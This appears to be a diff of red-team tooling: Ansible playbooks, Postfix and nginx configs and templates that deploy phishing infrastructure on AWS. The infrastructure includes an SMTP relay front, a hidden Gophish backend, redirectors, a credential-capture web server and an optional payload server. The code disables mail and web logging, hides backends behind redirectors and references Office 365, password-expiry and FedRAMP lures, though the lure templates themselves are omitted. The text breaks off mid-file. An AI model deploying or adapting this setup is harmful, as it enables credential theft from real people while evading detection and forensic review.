||||
|
||||
- name: Create nested header checks for advanced smuggling
|
||||
copy:
|
||||
dest: /etc/postfix/nested_header_checks
|
||||
content: |
|
||||
# Advanced SMTP smuggling patterns
|
||||
/^\s*<script/i IGNORE
|
||||
/^\s*<iframe/i IGNORE
|
||||
mode: '0644'
|
||||
notify:
|
||||
- reload postfix
|
||||
- postmap nested_header_checks
|
||||
|
||||
- name: Configure DKIM for domain reputation
|
||||
include_tasks: ../tasks/configure_mail.yml
|
||||
|
||||
- name: Create relay authentication
|
||||
copy:
|
||||
dest: /etc/postfix/sasl_passwd
|
||||
content: |
|
||||
{{ phishing_domain }} {{ smtp_relay_user }}:{{ smtp_relay_pass }}
|
||||
mode: '0600'
|
||||
owner: root
|
||||
group: root
|
||||
notify:
|
||||
- postmap sasl_passwd
|
||||
- restart postfix
|
||||
|
||||
- name: Configure transport maps for backend routing
|
||||
copy:
|
||||
dest: /etc/postfix/transport
|
||||
content: |
|
||||
{{ phishing_domain }} smtp:[{{ gophish_ip }}]:25
|
||||
.{{ phishing_domain }} smtp:[{{ gophish_ip }}]:25
|
||||
mode: '0644'
|
||||
notify:
|
||||
- postmap transport
|
||||
- restart postfix
|
||||
|
||||
- name: Install Python SMTP testing tools
|
||||
pip:
|
||||
name:
|
||||
- smtplib-extended
|
||||
- email-validator
|
||||
- faker
|
||||
state: present
|
||||
|
||||
- name: Create SMTP smuggling test script
|
||||
template:
|
||||
src: "../templates/phishing/smtp-smuggling-test.py.j2"
|
||||
dest: /root/Tools/smtp-smuggling-test.py
|
||||
mode: '0755'
|
||||
|
||||
- name: Create email reputation monitoring script
|
||||
template:
|
||||
src: "../templates/phishing/reputation-monitor.sh.j2"
|
||||
dest: /root/Tools/reputation-monitor.sh
|
||||
mode: '0755'
|
||||
|
||||
- name: Set up log monitoring for deliverability
|
||||
cron:
|
||||
name: "Monitor email deliverability"
|
||||
minute: "*/15"
|
||||
job: "/root/Tools/reputation-monitor.sh >> /var/log/reputation.log 2>&1"
|
||||
|
||||
handlers:
|
||||
- name: restart postfix
|
||||
service:
|
||||
name: postfix
|
||||
state: restarted
|
||||
|
||||
- name: reload postfix
|
||||
service:
|
||||
name: postfix
|
||||
state: reloaded
|
||||
|
||||
- name: postmap header_checks
|
||||
command: postmap /etc/postfix/header_checks
|
||||
|
||||
- name: postmap nested_header_checks
|
||||
command: postmap /etc/postfix/nested_header_checks
|
||||
|
||||
- name: postmap sasl_passwd
|
||||
command: postmap /etc/postfix/sasl_passwd
|
||||
|
||||
- name: postmap transport
|
||||
command: postmap /etc/postfix/transport
|
||||
@@ -0,0 +1,71 @@
|
||||
# Postfix MTA Front Configuration for Phishing Infrastructure
|
||||
# This server acts as the front-end mail relay
|
||||
|
||||
# Basic settings
|
||||
myhostname = {{ mta_hostname | default('mail.' + domain) }}
|
||||
mydomain = {{ domain }}
|
||||
myorigin = $mydomain
|
||||
mydestination = $myhostname, localhost
|
||||
inet_interfaces = all
|
||||
inet_protocols = ipv4
|
||||
|
||||
# Network settings
|
||||
mynetworks = 127.0.0.0/8 {{ gophish_server_ip }}/32 {{ mta_allowed_ips | default([]) | join(' ') }}
|
||||
relay_domains = $mydestination
|
||||
|
||||
# SMTP smuggling mitigation
|
||||
smtpd_forbid_bare_newline = yes
|
||||
smtpd_forbid_bare_newline_reject_code = 550
|
||||
|
||||
# TLS Configuration
|
||||
smtpd_tls_cert_file = /etc/letsencrypt/live/{{ mta_hostname | default('mail.' + domain) }}/fullchain.pem
|
||||
smtpd_tls_key_file = /etc/letsencrypt/live/{{ mta_hostname | default('mail.' + domain) }}/privkey.pem
|
||||
smtpd_use_tls = yes
|
||||
smtpd_tls_security_level = may
|
||||
smtpd_tls_protocols = !SSLv2, !SSLv3, !TLSv1, !TLSv1.1
|
||||
smtp_tls_security_level = may
|
||||
|
||||
# SASL Authentication
|
||||
smtpd_sasl_auth_enable = yes
|
||||
smtpd_sasl_type = dovecot
|
||||
smtpd_sasl_path = private/auth
|
||||
smtpd_sasl_security_options = noanonymous
|
||||
smtpd_sasl_authenticated_header = yes
|
||||
|
||||
# Restrictions
|
||||
smtpd_helo_required = yes
|
||||
smtpd_recipient_restrictions =
|
||||
permit_mynetworks,
|
||||
permit_sasl_authenticated,
|
||||
reject_unauth_destination,
|
||||
reject_unauth_pipelining,
|
||||
reject_invalid_helo_hostname,
|
||||
reject_non_fqdn_helo_hostname
|
||||
|
||||
# Rate limiting
|
||||
smtpd_client_connection_rate_limit = {{ rate_limit_connections | default(100) }}
|
||||
smtpd_client_message_rate_limit = {{ rate_limit_messages | default(100) }}
|
||||
|
||||
# Message size and queue settings
|
||||
message_size_limit = {{ max_message_size | default(10240000) }}
|
||||
mailbox_size_limit = 0
|
||||
queue_lifetime = 1h
|
||||
maximal_queue_lifetime = 1h
|
||||
bounce_queue_lifetime = 0
|
||||
|
||||
# Header modifications
|
||||
header_checks = regexp:/etc/postfix/header_checks
|
||||
|
||||
# DKIM signing
|
||||
milter_default_action = accept
|
||||
milter_protocol = 6
|
||||
smtpd_milters = unix:/var/spool/postfix/opendkim/opendkim.sock
|
||||
non_smtpd_milters = unix:/var/spool/postfix/opendkim/opendkim.sock
|
||||
|
||||
# Logging
|
||||
{% if zero_logs | default(true) %}
|
||||
# Zero-logs configuration
|
||||
syslog_facility = local0
|
||||
syslog_name =
|
||||
maillog_file = /dev/null
|
||||
{% endif %}
|
||||
@@ -0,0 +1,51 @@
|
||||
---
|
||||
# MTA Front server deployment for email relay and SMTP smuggling
|
||||
|
||||
- name: Deploy MTA Front server
|
||||
hosts: localhost
|
||||
gather_facts: false
|
||||
connection: local
|
||||
vars_files:
|
||||
- vars.yaml
|
||||
vars:
|
||||
mta_instance_type: "{{ mta_instance_type | default('t3.medium') }}"
|
||||
mta_region: "{{ mta_region | default(aws_region) }}"
|
||||
|
||||
tasks:
|
||||
- name: Create MTA Front instance
|
||||
include_tasks: "../tasks/create_instance.yml"
|
||||
vars:
|
||||
instance_name: "{{ server_name }}"
|
||||
instance_type: "{{ mta_instance_type }}"
|
||||
region: "{{ mta_region }}"
|
||||
security_group_rules:
|
||||
- { proto: tcp, port: 22, cidr: "{{ operator_ip }}/32", desc: "SSH from operator" }
|
||||
- { proto: tcp, port: 25, cidr: "0.0.0.0/0", desc: "SMTP from anywhere" }
|
||||
- { proto: tcp, port: 587, cidr: "0.0.0.0/0", desc: "SMTP submission" }
|
||||
- { proto: tcp, port: 465, cidr: "0.0.0.0/0", desc: "SMTPS" }
|
||||
|
||||
- name: Add MTA Front to inventory
|
||||
add_host:
|
||||
name: "mta_front"
|
||||
groups: "mta_fronts"
|
||||
ansible_host: "{{ instance_ip }}"
|
||||
ansible_user: "{{ ansible_user | default('ubuntu') }}"
|
||||
ansible_ssh_private_key_file: "{{ ssh_key_path }}"
|
||||
ansible_ssh_common_args: "-o StrictHostKeyChecking=no"
|
||||
|
||||
- name: Configure MTA Front server
|
||||
hosts: mta_fronts
|
||||
become: true
|
||||
gather_facts: true
|
||||
vars_files:
|
||||
- vars.yaml
|
||||
tasks:
|
||||
- name: Include MTA Front configuration
|
||||
include_tasks: "../tasks/configure_mta_front.yml"
|
||||
|
||||
- name: Include security hardening
|
||||
include_tasks: "../tasks/security_hardening.yml"
|
||||
|
||||
- name: Include tracker setup
|
||||
include_tasks: "../tasks/configure_integrated_tracker.yml"
|
||||
when: deploy_tracker | default(true) | bool
|
||||
@@ -0,0 +1,46 @@
|
||||
---
|
||||
# Phishing redirector deployment with advanced evasion
|
||||
|
||||
- name: Deploy phishing redirector
|
||||
hosts: localhost
|
||||
gather_facts: false
|
||||
connection: local
|
||||
vars_files:
|
||||
- vars.yaml
|
||||
vars:
|
||||
redirector_instance_type: "{{ redirector_instance_type | default('t3.small') }}"
|
||||
redirector_region: "{{ redirector_region | default(aws_region) }}"
|
||||
|
||||
tasks:
|
||||
- name: Create phishing redirector instance
|
||||
include_tasks: "../../providers/AWS/tasks/create_instance.yml"
|
||||
vars:
|
||||
instance_name: "{{ server_name }}"
|
||||
instance_type: "{{ redirector_instance_type }}"
|
||||
region: "{{ redirector_region }}"
|
||||
security_group_rules:
|
||||
- { proto: tcp, port: 22, cidr: "{{ operator_ip }}/32", desc: "SSH from operator" }
|
||||
- { proto: tcp, port: 80, cidr: "0.0.0.0/0", desc: "HTTP from anywhere" }
|
||||
- { proto: tcp, port: 443, cidr: "0.0.0.0/0", desc: "HTTPS from anywhere" }
|
||||
|
||||
- name: Add phishing redirector to inventory
|
||||
add_host:
|
||||
name: "phishing_redirector"
|
||||
groups: "phishing_redirectors"
|
||||
ansible_host: "{{ instance_ip }}"
|
||||
ansible_user: "{{ ansible_user | default('ubuntu') }}"
|
||||
ansible_ssh_private_key_file: "{{ ssh_key_path }}"
|
||||
ansible_ssh_common_args: "-o StrictHostKeyChecking=no"
|
||||
|
||||
- name: Configure phishing redirector
|
||||
hosts: phishing_redirectors
|
||||
become: true
|
||||
gather_facts: true
|
||||
vars_files:
|
||||
- vars.yaml
|
||||
tasks:
|
||||
- name: Include phishing redirector configuration
|
||||
include_tasks: "../redirectors/templates/configure_phishing_redirector.yml"
|
||||
|
||||
- name: Include security hardening
|
||||
include_tasks: "../../common/tasks/security_hardening.yml"
|
||||
@@ -0,0 +1,50 @@
|
||||
---
|
||||
# Phishing web server for credential harvesting
|
||||
|
||||
- name: Deploy phishing web server
|
||||
hosts: localhost
|
||||
gather_facts: false
|
||||
connection: local
|
||||
vars_files:
|
||||
- vars.yaml
|
||||
vars:
|
||||
webserver_instance_type: "{{ webserver_instance_type | default('t3.medium') }}"
|
||||
webserver_region: "{{ webserver_region | default(aws_region) }}"
|
||||
|
||||
tasks:
|
||||
- name: Create phishing web server instance
|
||||
include_tasks: "../tasks/create_instance.yml"
|
||||
vars:
|
||||
instance_name: "{{ server_name }}"
|
||||
instance_type: "{{ webserver_instance_type }}"
|
||||
region: "{{ webserver_region }}"
|
||||
security_group_rules:
|
||||
- { proto: tcp, port: 22, cidr: "{{ operator_ip }}/32", desc: "SSH from operator" }
|
||||
- { proto: tcp, port: 80, cidr: "{{ phishing_redirector_ip | default('10.0.0.0/8') }}/32", desc: "HTTP from redirector" }
|
||||
- { proto: tcp, port: 443, cidr: "{{ phishing_redirector_ip | default('10.0.0.0/8') }}/32", desc: "HTTPS from redirector" }
|
||||
|
||||
- name: Add phishing web server to inventory
|
||||
add_host:
|
||||
name: "phishing_webserver"
|
||||
groups: "phishing_webservers"
|
||||
ansible_host: "{{ instance_ip }}"
|
||||
ansible_user: "{{ ansible_user | default('ubuntu') }}"
|
||||
ansible_ssh_private_key_file: "{{ ssh_key_path }}"
|
||||
ansible_ssh_common_args: "-o StrictHostKeyChecking=no"
|
||||
|
||||
- name: Configure phishing web server
|
||||
hosts: phishing_webservers
|
||||
become: true
|
||||
gather_facts: true
|
||||
vars_files:
|
||||
- vars.yaml
|
||||
tasks:
|
||||
- name: Include phishing web server configuration
|
||||
include_tasks: "../tasks/configure_phishing_webserver.yml"
|
||||
|
||||
- name: Include security hardening
|
||||
include_tasks: "../tasks/security_hardening.yml"
|
||||
|
||||
- name: Include tracker setup
|
||||
include_tasks: "../tasks/configure_integrated_tracker.yml"
|
||||
when: deploy_tracker | default(true) | bool
|
||||
@@ -0,0 +1,111 @@
|
||||
---
|
||||
# FedRAMP compliance configuration for user awareness testing
|
||||
|
||||
- name: Create FedRAMP compliant landing pages
|
||||
template:
|
||||
src: "{{ item.src }}"
|
||||
dest: "{{ item.dest }}"
|
||||
mode: '0644'
|
||||
owner: www-data
|
||||
group: www-data
|
||||
with_items:
|
||||
- { src: "../templates/fedramp-success-page.html.j2", dest: "/var/www/phishing/fedramp-success.html" }
|
||||
- { src: "../templates/fedramp-education-page.html.j2", dest: "/var/www/phishing/fedramp-education.html" }
|
||||
- { src: "../templates/fedramp-training-materials.html.j2", dest: "/var/www/phishing/training.html" }
|
||||
|
||||
- name: Create FedRAMP compliant email templates
|
||||
template:
|
||||
src: "{{ item.src }}"
|
||||
dest: "{{ item.dest }}"
|
||||
mode: '0644'
|
||||
owner: root
|
||||
group: root
|
||||
with_items:
|
||||
- { src: "../templates/fedramp-email-template.html.j2", dest: "/root/Tools/phishing/templates/fedramp-email.html" }
|
||||
- { src: "../templates/fedramp-notification-email.html.j2", dest: "/root/Tools/phishing/templates/fedramp-notification.html" }
|
||||
|
||||
- name: Configure anonymized reporting
|
||||
template:
|
||||
src: "../templates/fedramp-reporting.py.j2"
|
||||
dest: "/root/Tools/phishing/fedramp-reporting.py"
|
||||
mode: '0755'
|
||||
owner: root
|
||||
group: root
|
||||
|
||||
- name: Create role-based tracking system
|
||||
template:
|
||||
src: "../templates/role-tracking.py.j2"
|
||||
dest: "/root/Tools/phishing/role-tracking.py"
|
||||
mode: '0755'
|
||||
owner: root
|
||||
group: root
|
||||
|
||||
- name: Set up immediate phish identification
|
||||
template:
|
||||
src: "../templates/immediate-identification.js.j2"
|
||||
dest: "/var/www/phishing/assets/immediate-identification.js"
|
||||
mode: '0644'
|
||||
owner: www-data
|
||||
group: www-data
|
||||
|
||||
- name: Create educational content delivery system
|
||||
template:
|
||||
src: "../templates/education-delivery.php.j2"
|
||||
dest: "/var/www/phishing/api/education.php"
|
||||
mode: '0644'
|
||||
owner: www-data
|
||||
group: www-data
|
||||
|
||||
- name: Configure compliance database schema
|
||||
shell: |
|
||||
sqlite3 /root/Tools/phishing/compliance.db << EOF
|
||||
CREATE TABLE IF NOT EXISTS fedramp_campaigns (
|
||||
id TEXT PRIMARY KEY,
|
||||
name TEXT NOT NULL,
|
||||
csp_organization TEXT NOT NULL,
|
||||
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
|
||||
status TEXT DEFAULT 'active'
|
||||
);
|
||||
|
||||
CREATE TABLE IF NOT EXISTS role_interactions (
|
||||
id INTEGER PRIMARY KEY AUTOINCREMENT,
|
||||
campaign_id TEXT NOT NULL,
|
||||
user_role TEXT NOT NULL,
|
||||
interaction_type TEXT NOT NULL,
|
||||
interaction_time DATETIME DEFAULT CURRENT_TIMESTAMP,
|
||||
education_completed BOOLEAN DEFAULT FALSE
|
||||
);
|
||||
|
||||
CREATE TABLE IF NOT EXISTS compliance_metrics (
|
||||
id INTEGER PRIMARY KEY AUTOINCREMENT,
|
||||
campaign_id TEXT NOT NULL,
|
||||
metric_type TEXT NOT NULL,
|
||||
metric_value INTEGER NOT NULL,
|
||||
recorded_at DATETIME DEFAULT CURRENT_TIMESTAMP
|
||||
);
|
||||
EOF
|
||||
args:
|
||||
creates: /root/Tools/phishing/compliance.db
|
||||
|
||||
- name: Set database permissions for compliance
|
||||
file:
|
||||
path: /root/Tools/phishing/compliance.db
|
||||
owner: www-data
|
||||
group: www-data
|
||||
mode: '0644'
|
||||
|
||||
- name: Create compliance report generator
|
||||
template:
|
||||
src: "../templates/compliance-report-generator.py.j2"
|
||||
dest: "/root/Tools/phishing/generate-compliance-report.py"
|
||||
mode: '0755'
|
||||
owner: root
|
||||
group: root
|
||||
|
||||
- name: Configure email allowlisting instructions
|
||||
template:
|
||||
src: "../templates/allowlist-instructions.md.j2"
|
||||
dest: "/root/Tools/phishing/ALLOWLIST_INSTRUCTIONS.md"
|
||||
mode: '0644'
|
||||
owner: root
|
||||
group: root
|
||||
@@ -0,0 +1,8 @@
|
||||
{# OMITTED — file_share phishing email template #}
|
||||
{#
|
||||
Jinja2 email template for the file_share lure scenario. Rendered at deploy
|
||||
time with target organization name, sender domain, and tracking pixel URL
|
||||
substituted. Designed to pass SPF/DKIM checks via the MTA-front relay.
|
||||
|
||||
Omitted from public release. Present in operational deployments.
|
||||
#}
|
||||
@@ -0,0 +1,8 @@
|
||||
{# OMITTED — office365_login phishing email template #}
|
||||
{#
|
||||
Jinja2 email template for the office365_login lure scenario. Rendered at deploy
|
||||
time with target organization name, sender domain, and tracking pixel URL
|
||||
substituted. Designed to pass SPF/DKIM checks via the MTA-front relay.
|
||||
|
||||
Omitted from public release. Present in operational deployments.
|
||||
#}
|
||||
@@ -0,0 +1,8 @@
|
||||
{# OMITTED — password_expiry phishing email template #}
|
||||
{#
|
||||
Jinja2 email template for the password_expiry lure scenario. Rendered at deploy
|
||||
time with target organization name, sender domain, and tracking pixel URL
|
||||
substituted. Designed to pass SPF/DKIM checks via the MTA-front relay.
|
||||
|
||||
Omitted from public release. Present in operational deployments.
|
||||
#}
|
||||
@@ -0,0 +1,8 @@
|
||||
{# OMITTED — security_alert phishing email template #}
|
||||
{#
|
||||
Jinja2 email template for the security_alert lure scenario. Rendered at deploy
|
||||
time with target organization name, sender domain, and tracking pixel URL
|
||||
substituted. Designed to pass SPF/DKIM checks via the MTA-front relay.
|
||||
|
||||
Omitted from public release. Present in operational deployments.
|
||||
#}
|
||||
@@ -0,0 +1,8 @@
|
||||
{# OMITTED — trellix-sub phishing email template #}
|
||||
{#
|
||||
Jinja2 email template for the trellix-sub lure scenario. Rendered at deploy
|
||||
time with target organization name, sender domain, and tracking pixel URL
|
||||
substituted. Designed to pass SPF/DKIM checks via the MTA-front relay.
|
||||
|
||||
Omitted from public release. Present in operational deployments.
|
||||
#}
|
||||
@@ -0,0 +1,5 @@
|
||||
{# OMITTED — FedRAMP compliance lure template #}
|
||||
{#
|
||||
Phishing page styled to mimic a FedRAMP compliance portal. Used in
|
||||
engagements targeting federal contractors. Omitted from public release.
|
||||
#}
|
||||
@@ -0,0 +1,69 @@
|
||||
{
|
||||
"deployment_id": "{{ deployment_id }}",
|
||||
"deployment_time": "{{ ansible_date_time.iso8601 }}",
|
||||
"provider": "{{ provider }}",
|
||||
"region": "{{ aws_region | default(linode_region) | default('') }}",
|
||||
|
||||
"infrastructure": {
|
||||
"mta_front": {
|
||||
"name": "{{ mta_front_name | default('mta-' + deployment_id) }}",
|
||||
"ip": "{{ mta_front_ip | default('') }}",
|
||||
"instance_id": "{{ mta_instance_id | default('') }}"
|
||||
},
|
||||
"gophish_server": {
|
||||
"name": "{{ gophish_server_name | default('gophish-' + deployment_id) }}",
|
||||
"ip": "{{ gophish_server_ip | default('') }}",
|
||||
"instance_id": "{{ gophish_instance_id | default('') }}",
|
||||
"admin_port": "{{ gophish_admin_port | default('8090') }}"
|
||||
},
|
||||
"phishing_webserver": {
|
||||
"name": "{{ phishing_web_name | default('web-' + deployment_id) }}",
|
||||
"ip": "{{ phishing_web_ip | default('') }}",
|
||||
"instance_id": "{{ phishing_web_instance_id | default('') }}"
|
||||
},
|
||||
"phishing_redirector": {
|
||||
"name": "{{ phishing_redirector_name | default('redirector-' + deployment_id) }}",
|
||||
"ip": "{{ phishing_redirector_ip | default('') }}",
|
||||
"instance_id": "{{ phishing_redirector_instance_id | default('') }}"
|
||||
},
|
||||
{% if deploy_payload_infra | default(false) %}
|
||||
"payload_server": {
|
||||
"name": "{{ payload_server_name | default('payload-' + deployment_id) }}",
|
||||
"ip": "{{ payload_server_ip | default('') }}",
|
||||
"instance_id": "{{ payload_server_instance_id | default('') }}"
|
||||
},
|
||||
"payload_redirector": {
|
||||
"name": "{{ payload_redirector_name | default('payload-redir-' + deployment_id) }}",
|
||||
"ip": "{{ payload_redirector_ip | default('') }}",
|
||||
"instance_id": "{{ payload_redirector_instance_id | default('') }}"
|
||||
},
|
||||
{% endif %}
|
||||
},
|
||||
|
||||
"domains": {
|
||||
"phishing_domain": "{{ phishing_domain | default('N/A') }}",
|
||||
"mta_domain": "{{ mta_hostname | default('mail.' + (phishing_domain | default('example.com'))) }}",
|
||||
{% if deploy_payload_infra | default(false) %}
|
||||
"payload_domain": "{{ payload_subdomain | default('payload') }}.{{ phishing_domain | default('example.com') }}",
|
||||
{% endif %}
|
||||
},
|
||||
|
||||
"credentials": {
|
||||
"gophish_url": "https://{{ gophish_server_ip | default('TBD') }}:{{ gophish_admin_port | default('8090') }}",
|
||||
"smtp_auth_user": "{{ smtp_auth_user | default('admin') }}",
|
||||
"smtp_settings": {
|
||||
"host": "{{ mta_front_ip | default('TBD') }}",
|
||||
"port": 25,
|
||||
"from_address": "{{ smtp_from_address | default('noreply@' + (phishing_domain | default('example.com'))) }}"
|
||||
}
|
||||
},
|
||||
|
||||
"security_groups": {
|
||||
{% if provider == 'aws' %}
|
||||
"mta_sg": "{{ mta_security_group_id | default('') }}",
|
||||
"gophish_sg": "{{ gophish_security_group_id | default('') }}",
|
||||
"web_sg": "{{ web_security_group_id | default('') }}",
|
||||
"redirector_sg": "{{ redirector_security_group_id | default('') }}"
|
||||
{% endif %}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,85 @@
|
||||
---
|
||||
# Configure phishing web server with landing pages and credential capture
|
||||
|
||||
- name: Install required packages
|
||||
apt:
|
||||
name:
|
||||
- nginx
|
||||
- php-fpm
|
||||
- php-json
|
||||
- certbot
|
||||
- python3-certbot-nginx
|
||||
state: present
|
||||
update_cache: yes
|
||||
|
||||
- name: Create web directories
|
||||
file:
|
||||
path: "{{ item }}"
|
||||
state: directory
|
||||
mode: '0755'
|
||||
owner: www-data
|
||||
group: www-data
|
||||
loop:
|
||||
- /var/www/phishing
|
||||
- /var/www/phishing/templates
|
||||
- /var/www/phishing/static
|
||||
- /var/www/phishing/captures
|
||||
- /var/private/phishing_creds
|
||||
|
||||
- name: Deploy phishing templates
|
||||
template:
|
||||
src: "{{ item.src }}"
|
||||
dest: "{{ item.dest }}"
|
||||
mode: '0644'
|
||||
owner: www-data
|
||||
group: www-data
|
||||
loop:
|
||||
- { src: "../templates/phishing/phishing-landing-page.j2", dest: "/var/www/phishing/index.html" }
|
||||
- { src: "../templates/phishing/email-templates/office365_login.j2", dest: "/var/www/phishing/templates/o365.html" }
|
||||
- { src: "../templates/phishing/email-templates/password_expiry.j2", dest: "/var/www/phishing/templates/password.html" }
|
||||
- { src: "../templates/phishing/email-templates/security_alert.j2", dest: "/var/www/phishing/templates/security.html" }
|
||||
- { src: "../templates/phishing/email-templates/file_share.j2", dest: "/var/www/phishing/templates/share.html" }
|
||||
|
||||
- name: Deploy credential capture script
|
||||
template:
|
||||
src: "../templates/phishing/capture.php.j2"
|
||||
dest: "/var/www/phishing/capture.php"
|
||||
mode: '0640'
|
||||
owner: www-data
|
||||
group: www-data
|
||||
|
||||
- name: Configure NGINX for phishing sites
|
||||
template:
|
||||
src: "../templates/phishing/nginx-phishing-webserver.j2"
|
||||
dest: /etc/nginx/sites-available/phishing
|
||||
mode: '0644'
|
||||
|
||||
- name: Enable phishing site
|
||||
file:
|
||||
src: /etc/nginx/sites-available/phishing
|
||||
dest: /etc/nginx/sites-enabled/phishing
|
||||
state: link
|
||||
|
||||
- name: Remove default nginx site
|
||||
file:
|
||||
path: /etc/nginx/sites-enabled/default
|
||||
state: absent
|
||||
|
||||
- name: Configure PHP-FPM for security
|
||||
lineinfile:
|
||||
path: /etc/php/7.4/fpm/php.ini
|
||||
regexp: "{{ item.regexp }}"
|
||||
line: "{{ item.line }}"
|
||||
loop:
|
||||
- { regexp: '^expose_php', line: 'expose_php = Off' }
|
||||
- { regexp: '^display_errors', line: 'display_errors = Off' }
|
||||
- { regexp: '^log_errors', line: 'log_errors = On' }
|
||||
|
||||
- name: Restart services
|
||||
systemd:
|
||||
name: "{{ item }}"
|
||||
state: restarted
|
||||
enabled: yes
|
||||
loop:
|
||||
- nginx
|
||||
- php7.4-fpm
|
||||
@@ -0,0 +1,183 @@
|
||||
---
|
||||
# Configure security groups and firewall rules for phishing infrastructure
|
||||
|
||||
- name: Configure MTA Front security
|
||||
block:
|
||||
- name: Create MTA Front security group
|
||||
amazon.aws.ec2_security_group:
|
||||
name: "mta-front-{{ deployment_id }}"
|
||||
description: "Security group for MTA Front server"
|
||||
vpc_id: "{{ vpc_id }}"
|
||||
region: "{{ aws_region }}"
|
||||
rules:
|
||||
# Management access
|
||||
- proto: tcp
|
||||
ports: 22
|
||||
cidr_ip: "{{ operator_ip }}/32"
|
||||
rule_desc: "SSH from operator"
|
||||
|
||||
# SMTP services - public facing
|
||||
- proto: tcp
|
||||
ports: 25
|
||||
cidr_ip: "0.0.0.0/0"
|
||||
rule_desc: "SMTP from anywhere"
|
||||
|
||||
- proto: tcp
|
||||
ports: 587
|
||||
cidr_ip: "0.0.0.0/0"
|
||||
rule_desc: "SMTP submission"
|
||||
|
||||
- proto: tcp
|
||||
ports: 465
|
||||
cidr_ip: "0.0.0.0/0"
|
||||
rule_desc: "SMTPS"
|
||||
|
||||
rules_egress:
|
||||
- proto: -1
|
||||
cidr_ip: "0.0.0.0/0"
|
||||
state: present
|
||||
when: deployment_components.mta_front | default(false) | bool
|
||||
|
||||
- name: Configure Gophish security (hidden backend)
|
||||
block:
|
||||
- name: Create Gophish security group
|
||||
amazon.aws.ec2_security_group:
|
||||
name: "gophish-{{ deployment_id }}"
|
||||
description: "Security group for Gophish server (hidden)"
|
||||
vpc_id: "{{ vpc_id }}"
|
||||
region: "{{ aws_region }}"
|
||||
rules:
|
||||
# Management access only
|
||||
- proto: tcp
|
||||
ports: 22
|
||||
cidr_ip: "{{ operator_ip }}/32"
|
||||
rule_desc: "SSH from operator"
|
||||
|
||||
- proto: tcp
|
||||
ports: 3333
|
||||
cidr_ip: "{{ operator_ip }}/32"
|
||||
rule_desc: "Gophish admin interface"
|
||||
|
||||
# Internal communication only
|
||||
- proto: tcp
|
||||
ports: 80
|
||||
cidr_ip: "{{ phishing_redirector_ip }}/32"
|
||||
rule_desc: "HTTP from phishing redirector"
|
||||
|
||||
- proto: tcp
|
||||
ports: 25
|
||||
cidr_ip: "{{ mta_front_ip }}/32"
|
||||
rule_desc: "SMTP from MTA front"
|
||||
|
||||
rules_egress:
|
||||
- proto: -1
|
||||
cidr_ip: "0.0.0.0/0"
|
||||
state: present
|
||||
when: deployment_components.gophish | default(false) | bool
|
||||
|
||||
- name: Configure Phishing Redirector security (public facing)
|
||||
block:
|
||||
- name: Create Phishing Redirector security group
|
||||
amazon.aws.ec2_security_group:
|
||||
name: "phish-redirector-{{ deployment_id }}"
|
||||
description: "Security group for Phishing Redirector"
|
||||
vpc_id: "{{ vpc_id }}"
|
||||
region: "{{ aws_region }}"
|
||||
rules:
|
||||
# Management access
|
||||
- proto: tcp
|
||||
ports: 22
|
||||
cidr_ip: "{{ operator_ip }}/32"
|
||||
rule_desc: "SSH from operator"
|
||||
|
||||
# Public web access
|
||||
- proto: tcp
|
||||
ports: 80
|
||||
cidr_ip: "0.0.0.0/0"
|
||||
rule_desc: "HTTP from anywhere"
|
||||
|
||||
- proto: tcp
|
||||
ports: 443
|
||||
cidr_ip: "0.0.0.0/0"
|
||||
rule_desc: "HTTPS from anywhere"
|
||||
|
||||
rules_egress:
|
||||
- proto: -1
|
||||
cidr_ip: "0.0.0.0/0"
|
||||
state: present
|
||||
when: deployment_components.phishing_redirector | default(false) | bool
|
||||
|
||||
- name: Configure Phishing Web Server security (hidden backend)
|
||||
block:
|
||||
- name: Create Phishing Web Server security group
|
||||
amazon.aws.ec2_security_group:
|
||||
name: "phish-webserver-{{ deployment_id }}"
|
||||
description: "Security group for Phishing Web Server (hidden)"
|
||||
vpc_id: "{{ vpc_id }}"
|
||||
region: "{{ aws_region }}"
|
||||
rules:
|
||||
# Management access only
|
||||
- proto: tcp
|
||||
ports: 22
|
||||
cidr_ip: "{{ operator_ip }}/32"
|
||||
rule_desc: "SSH from operator"
|
||||
|
||||
# Internal communication only
|
||||
- proto: tcp
|
||||
ports: 80
|
||||
cidr_ip: "{{ phishing_redirector_ip }}/32"
|
||||
rule_desc: "HTTP from phishing redirector"
|
||||
|
||||
- proto: tcp
|
||||
ports: 443
|
||||
cidr_ip: "{{ phishing_redirector_ip }}/32"
|
||||
rule_desc: "HTTPS from phishing redirector"
|
||||
|
||||
rules_egress:
|
||||
- proto: -1
|
||||
cidr_ip: "0.0.0.0/0"
|
||||
state: present
|
||||
when: deployment_components.phishing_webserver | default(false) | bool
|
||||
|
||||
- name: Configure Payload Server security (hidden backend)
|
||||
block:
|
||||
- name: Create Payload Server security group
|
||||
amazon.aws.ec2_security_group:
|
||||
name: "payload-server-{{ deployment_id }}"
|
||||
description: "Security group for Payload Server (hidden)"
|
||||
vpc_id: "{{ vpc_id }}"
|
||||
region: "{{ aws_region }}"
|
||||
rules:
|
||||
# Management access only
|
||||
- proto: tcp
|
||||
ports: 22
|
||||
cidr_ip: "{{ operator_ip }}/32"
|
||||
rule_desc: "SSH from operator"
|
||||
|
||||
# Internal communication only
|
||||
- proto: tcp
|
||||
ports: 80
|
||||
cidr_ip: "{{ payload_redirector_ip }}/32"
|
||||
rule_desc: "HTTP from payload redirector"
|
||||
|
||||
- proto: tcp
|
||||
ports: 443
|
||||
cidr_ip: "{{ payload_redirector_ip }}/32"
|
||||
rule_desc: "HTTPS from payload redirector"
|
||||
|
||||
rules_egress:
|
||||
- proto: -1
|
||||
cidr_ip: "0.0.0.0/0"
|
||||
state: present
|
||||
when: deployment_components.payload_server | default(false) | bool
|
||||
|
||||
- name: Display security configuration summary
|
||||
debug:
|
||||
msg:
|
||||
- "Phishing Infrastructure Security Configuration"
|
||||
- "============================================="
|
||||
- "✓ Least privilege access implemented"
|
||||
- "✓ Backend servers hidden from public access"
|
||||
- "✓ Only redirectors/MTA fronts are publicly accessible"
|
||||
- "✓ Operator-only SSH access configured"
|
||||
- "✓ Internal communication secured"
|
||||
@@ -0,0 +1,40 @@
|
||||
server {
|
||||
listen 80;
|
||||
server_name _;
|
||||
|
||||
root /var/www/phishing;
|
||||
index index.html index.php;
|
||||
|
||||
# Disable all logging
|
||||
access_log off;
|
||||
error_log /dev/null crit;
|
||||
|
||||
# PHP processing
|
||||
location ~ \.php$ {
|
||||
include snippets/fastcgi-php.conf;
|
||||
